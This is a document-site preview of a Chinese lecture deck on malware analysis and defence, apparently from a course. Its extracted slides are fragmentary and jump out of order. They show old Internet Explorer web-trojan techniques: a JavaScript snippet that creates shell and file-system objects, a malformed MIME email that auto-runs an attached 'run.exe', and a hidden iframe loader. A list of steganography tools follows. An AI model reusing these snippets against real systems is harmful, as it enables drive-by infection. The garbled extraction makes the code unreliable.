网络安全后门教程.ppt_第1页
网络安全后门教程.ppt_第2页
网络安全后门教程.ppt_第3页
网络安全后门教程.ppt_第4页
网络安全后门教程.ppt_第5页
已阅读5页,还剩58页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、2020/12/3,1,恶意软件(病毒)的分析与防范 Defence x.asp; x.htm,2020/12/3,36,x.htm, 数据装载中,可能需要10秒至30秒. ,2020/12/3,37,x.asp,1-在cache中寻找1.bmp 2-把bmp还原为exe 3-执行exe,2020/12/3,38,正常网页中携带, Window.open Onload, onerror ,2020/12/3,39,网页病毒、网页木马的原理,Javascript.Exception.Exploit :JS+WSH 错误的MIME Multipurpose Internet Mail Extent

2、ions,多用途的网际邮件扩充协议头. IE5.0到IE6.0 EXE to .BMP + Javascritp.Exception.Exploit iframe 漏洞的利用:父窗口能在子域环境下运行脚本代码,包括任意的恶意代码 通过安全认证的CAB,COX EXE文件的捆绑,2020/12/3,40,Javascript.Exception.Exploit,Function destroy()try a1=document.applets0; a1.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B); a1.createInstance(); Shl

3、 = a1.GetObject(); a1.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228); a1.createInstance(); FSO = a1.GetObject(); a1.setCLSID(F935DC26-1CF0-11D0-ADB9-00C04FD58A0B); a1.createInstance(); Net = a1.GetObject(); try do something; catch(e) catch(e) function do() setTimeout(destroy(), 1000); /设定运行时间1秒 do()

4、 /坏事执行函数指令,2020/12/3,41,错误的MIME Multipurpose Internet Mail Extentions,Content-Type: multipart/related;type=multipart/alternative“;boundary=”=B=“-=B=Content-Type: multipart/alternative;boundary=”=A=“-=A=Content-Type: text/html;Content-Transfer-Encoding: quoted-printable-=A=-=B=Content-Type: audio/x-w

5、av;name=”run.exe“ -可以改为其他脚本文件Content-Transfer-Encoding: base64Content-ID: -以下省略AAAAA N+1个-,当申明邮件 的类型为audio/x-wav时,IE存在的一个漏洞会将附件认为是音频文件自动尝试打开,2020/12/3,42,iframe,iframe src=run.eml width=0 height=0/iframe,2020/12/3,43,Startup.html, startup document.getElementById(clientcall).click() ,2020/12/3,44,HTA

6、的全名为HTML Application, 参见x.asp,2020/12/3,45,各种溢出型漏洞,iframe溢出 Javaprxy.DLL COM对象堆溢出漏洞 ,2020/12/3,46,木马的发展,加入Rootkit,隐藏文件/端口/服务/进程等 HTTP隧道 HyDan(把信息隐藏在二进制文件中) ,2020/12/3,47, ) Then% hidden data can be directly read off an audio CD. Includes encryption. Data Privacy Tools (Freeware) Uses BMP carrier fil

7、es and includes encryption.,2020/12/3,62,Hide information in a file,Data Stash (Shareware) - Uses BMP and database carrier files and includes password protection. Digital Picture Envelope v1.0 (Freeware) - Uses BMP carrier files. Encrypt Pic (Shareware) - Uses 24-bit BMP carrier files and includes e

8、ncryption. Gif-it-Up (Freeware) - Uses GIF carrier files and includes encryption. Gifshuffle v2.0 (Freeware) - A command-line tool that uses GIF carrier files and includes encryption. Hermetic Stego (Shareware) - Uses BMP carrier files. The developers claim their stego key makes the payload undetect

9、able. Hide and Seek for Win95 (Shareware) - Uses BMP carrier files and includes encryption and file wiping. Hide4PGP v2.0 (Freeware) - A command-line tool that uses BMP, WAV, and VOC carrier files. Hide In Picture 2.0 (Freeware) - USes BMP carrier files and includes encryption. ImageHide (Freeware)

10、- Uses a variety of image carrier files. In Plain View (Freeware) - Uses BMP carrier files and includes password protection. In The Picture (Shareware) - Uses BMP carrier files and includes encryption.,2020/12/3,63,InfoStego (Freeware)- Uses BMP carrier files; includes encryption. Invisible Secrets

11、v4.0 (Shareware) - Uses JPEG, PNG, BMP, HTML and WAV carrier files. Includes encryption, shredder, password manager and self-decrypting archives. JPegX (Freeware) - Uses JPEG carrier files and includes encryption and password protection. JP Hide and Seek (Freeware) - Uses JPEG carrier files and incl

12、udes encryption. JSteg Shell v2.0 (Freeware) - Uses JPEG carrier files; includes encryption. MP3Stego (Freeware) - Uses MP3 carrier files. PGPn123 (Freeware) - A tool that facilitates using PGP for Eudora, Agent, or Pegasus Mail and also includes a steganography option. PhotoCrypt 1.1 (Freeware) - U

13、ses BMP carrier files. Sams Big Play Maker (Freeware) - A text generation tool that converts a message into an output that looks like a play. Scramdisk (Freeware) - A disk encryption program that allows the creation and use of virtual encrypted drives. Scytale 32bit (Freeware) - A PGP shell program

14、that uses PCX carrier files. SecurEngine 4.0 (Freeware) - Uses BMP, JPEG, WAV, and txt files as carrier files. Includes encryption, file wiping, a password manager, and self-decrypting archives. Stash-It v1.1 (Freeware) - Uses BMP, GIF, TIFF, PNG or PCX carrier files. Steghide 0.4.6b (Freeware) - Us

15、es BMP, WAV and AU carrier files. Includes encryption. Stego-Lame (Freeware) - Uses various audio formats as carrier files. Written in Windows C source code; must be compiled before use. S-Tools 4 - (Freeware) - Uses BMP, GIF, and WAV carrier files; includes password and encryption options. The Third Eye (Freeware) - Uses BMP, GIF, and PCX carrier fi

人人文库> 全部分类> 教育资料 > 中学教育

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论